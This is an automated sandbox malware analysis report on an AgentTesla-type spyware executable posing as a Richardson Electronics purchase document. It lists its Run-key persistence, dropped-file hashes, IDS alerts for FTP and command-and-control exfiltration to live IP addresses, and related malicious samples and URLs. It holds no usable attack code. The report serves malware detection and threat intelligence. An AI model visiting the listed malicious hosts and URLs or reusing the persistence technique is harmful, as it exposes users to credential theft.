                                          Analysis ID:1520579
                                          Start date and time:2024-09-27 16:00:09 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 4s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:14
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Richardson Electronics, LTD. PRD10221301UUE.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 86%
                                          • Number of executed functions: 440
                                          • Number of non-executed functions: 40
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: Richardson Electronics, LTD. PRD10221301UUE.exe
                                          TimeTypeDescription
                                          16:01:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Eggdjjrhey C:\Users\user\AppData\Roaming\Eggdjjrhey.exe
                                          16:01:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Eggdjjrhey C:\Users\user\AppData\Roaming\Eggdjjrhey.exe
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          67.212.175.162BITUMEN_60-70_-_JUMBO_Specification.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                          • www.northjerseylocksmith.net/2nbp/?ab=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1g60uhCq/kzTYQUQ==&wZHp=LTklpdd0lp
                                          EL-515-_HEAT_TRACING.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                          • www.northjerseylocksmith.net/2nbp/?I8Z=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1tnGq8XaOUlQYxDpzveej3TzCy&WN6=OLgLTlRhCRRxTxN
                                          5.2.84.236PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                                  Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                                    Teklif 8822321378 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=http://5ln.gpr.carfield.com.tr./?YYY%3A%2F%2F%23.bWljaGFlbC5keWtlc0BjZXFsZC5vcmcuYXU=Get hashmaliciousUnknownBrowse
                                                        KAL_00192839403-28122021.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                                          Halkbank.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            wymascensores.comPURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 67.212.175.162
                                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 67.212.175.162
                                                            RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 67.212.175.162
                                                            Su documento de env#U00edo--------pdf.exeGet hashmaliciousUnknownBrowse
                                                            • 67.212.175.162
                                                            Su documento de env#U00edo--------pdf.exeGet hashmaliciousUnknownBrowse
                                                            • 67.212.175.162
                                                            1715875158543a5e3b677362bc060cf9b6a7a69e2457d0c48ef2d6bda0e2ce3c4ddc38a017752.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 67.212.175.162
                                                            Teklif 8822321378 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 67.212.175.162
                                                            rDocumentodeembarque.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 67.212.175.162
                                                            ORGB.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 67.212.175.162
                                                            16994321449b5d87caf658afbfe178cb9c8422736bcc47ae132c88fa1893a91c088bd24282963.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 67.212.175.162
                                                            ftp.alternatifplastik.comPURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 5.2.84.236
                                                            OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            SINGLEHOP-LLCUSPURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 67.212.175.162
                                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 67.212.175.162
                                                            PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                            • 172.96.187.60
                                                            RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 67.212.175.162
                                                            https://xtrafree.x10.mx/Get hashmaliciousUnknownBrowse
                                                            • 198.91.81.14
                                                            http://dev-265334124785.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                                            • 198.143.164.252
                                                            http://dev-gdtf.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                                            • 198.143.164.252
                                                            http://www.rb.gy/onu2r0/Get hashmaliciousUnknownBrowse
                                                            • 198.143.164.252
                                                            http://www.rb.gy/v99361/Get hashmaliciousUnknownBrowse
                                                            • 198.143.164.252
                                                            rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                            • 172.96.187.60
                                                            ALASTYRTRPURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                                            • 5.2.84.221
                                                            BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                                            • 5.2.84.221
                                                            Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 5.2.84.236
                                                            eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                            • 5.2.85.36
                                                            OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            http://www.idecon.com.trGet hashmaliciousUnknownBrowse
                                                            • 5.2.84.231
                                                            Teklif 8822321378 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 5.2.84.236
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0ePURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 67.212.175.162
                                                            http://polskie-torrenty.eu/redir.php?url=https://globalfinanceweb.com%2FProfile%2Fluig%2Fnzx0k%2FmProtect.html%23abrumley@highlandfunds.comGet hashmaliciousUnknownBrowse
                                                            • 67.212.175.162
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 67.212.175.162
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 67.212.175.162
                                                            rQuotation3200025006.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 67.212.175.162
                                                            .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 67.212.175.162
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 67.212.175.162
                                                            https://smallpdf.com/sign-pdf/document#data=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczovL2VzaWduLnNtYWxscGRmLXN0YWdpbmcuY29tIiwic3ViIjoiNjE3MmQyMzMtODcyNy00M2NhLWI1NjQtYjgwZDUyZjYxYmVjIiwiYXVkIjpbImVzaWduIl0sImV4cCI6MTcyODYzODEyMCwibmJmIjoxNzI3NDI4NTIwLCJpYXQiOjE3Mjc0Mjg1MjAsImp0aSI6IjYxNzJkMjMzLTg3MjctNDNjYS1iNTY0LWI4MGQ1MmY2MWJlYyIsInBheWxvYWQiOnsiZW52ZWxvcGVfaWQiOiI2ZWRlMzFjZS00Mzc2LTQwYzItYjJjNy1jMDc2Y2M3MjY4NjIiLCJzaWduX3JlcXVlc3RfaWQiOiI2MTcyZDIzMy04NzI3LTQzY2EtYjU2NC1iODBkNTJmNjFiZWMiLCJ0b2tlbl90eXBlIjoibm90aWZpY2F0aW9uIiwidXNlcl9lbWFpbCI6ImNoYW8ud3VAd3JpLm9yZyIsInVzZXJfZmlyc3RuYW1lIjoiY2hhby53dUB3cmkub3JnIiwidXNlcl9sYXN0bmFtZSI6ImNoYW8ud3VAd3JpLm9yZyJ9fQ.UX67GiHBKgjV8XyH-SFTt_KgB2I_q2j9cbGTSqbzRvY&eid=6ede31ce-4376-40c2-b2c7-c076cc726862&esrt=6172d233-8727-43ca-b564-b80d52f61becGet hashmaliciousUnknownBrowse
                                                            • 67.212.175.162
                                                            8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                                            • 67.212.175.162
                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 67.212.175.162
                                                            No context
                                                            Process:C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):6656
                                                            Entropy (8bit):4.675663759598992
                                                            Encrypted:false
                                                            SSDEEP:96:Ey0sGxi1iavaSmlsXmMHuptEknfR5M+8lpoFvbOElQouRzNt:vRZvaDa2eu/lffAoBbOcQlz
                                                            MD5:A93062EA78A516E011DFD18D4C462C87
                                                            SHA1:3CE876B96600C4D0252C73FA97C4ED0764B29503
                                                            SHA-256:3B799063AA6A0A79E4A160B4650DC3199EBE128D1A183DE4591E03A0B29674F1
                                                            SHA-512:B8FB16D0AD87A7A17C461E38DAE2EC6A9CE62811AE8DD64F4D69E235BD3252055C62985BF3A2F1B569F8930DB881F13A795DB8DEE2856AEAC282F1DC3EB37948
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................n/... ...@....@.. ....................................`................................../..O....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P/......H........".. .............................................................(....*..(....*:.(......}....*.s....s....*..0..........(....(......o....*...0..2........s......r...po............9.....o............&...*......................,-.......0..b.......(.....o.....s.......89...........(........o......(....o...........9.....(.......X...o....2..o....*.........."@.......0..D........9......:....rU..ps....z...(....(......{.....o.........&.....&.....*.........7...........=.......0..
                                                            Process:C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):4.675663759598992
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:Richardson Electronics, LTD. PRD10221301UUE.exe
                                                            File size:6'656 bytes
                                                            MD5:a93062ea78a516e011dfd18d4c462c87
                                                            SHA1:3ce876b96600c4d0252c73fa97c4ed0764b29503
                                                            SHA256:3b799063aa6a0a79e4a160b4650dc3199ebe128d1a183de4591e03a0b29674f1
                                                            SHA512:b8fb16d0ad87a7a17c461e38dae2ec6a9ce62811ae8dd64f4d69e235bd3252055c62985bf3a2f1b569f8930db881f13a795db8dee2856aeac282f1dc3eb37948
                                                            SSDEEP:96:Ey0sGxi1iavaSmlsXmMHuptEknfR5M+8lpoFvbOElQouRzNt:vRZvaDa2eu/lffAoBbOcQlz
                                                            TLSH:5AD1EA04E3D8C33BD9B78B79ACB357000379E7229D6BEB6D2DC4522A6D177900A61771
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................n/... ...@....@.. ....................................`................................
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x402f6e
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x66F5F8BA [Fri Sep 27 00:13:46 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2f1c0x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x5a6.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xf740x1000c8f48143c20e066efd507f15d74e8100False0.5888671875data5.333840409786742IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x40000x5a60x6003bdb64a491025f69def5b7b6b1e6166fFalse0.4166666666666667data4.060264088334241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x60000xc0x200da38bbbfd65412440a100e71e23c67dbFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0x40a00x31cdata0.4296482412060301
                                                            RT_MANIFEST0x43bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                            DLLImport
                                                            mscoree.dll_CorExeMain
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-09-27T16:01:04.569664+02002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII167.212.175.162443192.168.2.649710TCP
                                                            2024-09-27T16:01:04.569664+02002022640ET MALWARE PE EXE or DLL Windows file download Text M2167.212.175.162443192.168.2.649710TCP
                                                            2024-09-27T16:01:10.113187+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.6497125.2.84.23621TCP
                                                            2024-09-27T16:01:10.736443+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.6497135.2.84.23660306TCP
                                                            2024-09-27T16:01:10.742226+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.6497135.2.84.23660306TCP
                                                            2024-09-27T16:01:18.477927+02002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII167.212.175.162443192.168.2.649715TCP
                                                            2024-09-27T16:01:18.477927+02002022640ET MALWARE PE EXE or DLL Windows file download Text M2167.212.175.162443192.168.2.649715TCP
                                                            2024-09-27T16:01:24.660564+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.6497195.2.84.23621TCP
                                                            2024-09-27T16:01:25.283301+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.6497225.2.84.23660969TCP
                                                            2024-09-27T16:01:25.294359+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.6497225.2.84.23660969TCP
                                                            2024-09-27T16:01:27.465530+02002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII167.212.175.162443192.168.2.649724TCP
                                                            2024-09-27T16:01:27.465530+02002022640ET MALWARE PE EXE or DLL Windows file download Text M2167.212.175.162443192.168.2.649724TCP
                                                            2024-09-27T16:01:33.445294+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.6497255.2.84.23621TCP
                                                            2024-09-27T16:01:34.057672+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.6497265.2.84.23649791TCP
                                                            2024-09-27T16:01:34.063546+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.6497265.2.84.23649791TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 27, 2024 16:01:03.732736111 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:03.732788086 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:03.732892990 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:03.747292995 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:03.747313976 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.275127888 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.275285959 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.280009985 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.280026913 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.280323029 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.321481943 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.339591026 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.387397051 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.461178064 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.461211920 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.461220980 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.461289883 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.461307049 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.481122017 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.481214046 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.481235027 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.524722099 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.548230886 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.548239946 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.548271894 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.548315048 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.548834085 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.549839020 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.549848080 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.549904108 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.550698996 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.550708055 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.551156998 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.551156998 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.569638014 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.569653988 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.569725990 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.636636972 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.636782885 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.637168884 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.637243986 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.638168097 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.638250113 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.638992071 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.639195919 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.639326096 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.639413118 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.640233994 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.640408039 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.641114950 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.641236067 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.658404112 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.658554077 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.725430965 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.725692034 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.725707054 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.725738049 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.725790977 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.725790977 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.726267099 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.726375103 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.726773977 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.726902008 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.727071047 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.727197886 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.727737904 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.727818012 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.728089094 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.728163958 CEST49710443192.168.2.667.212.175.162
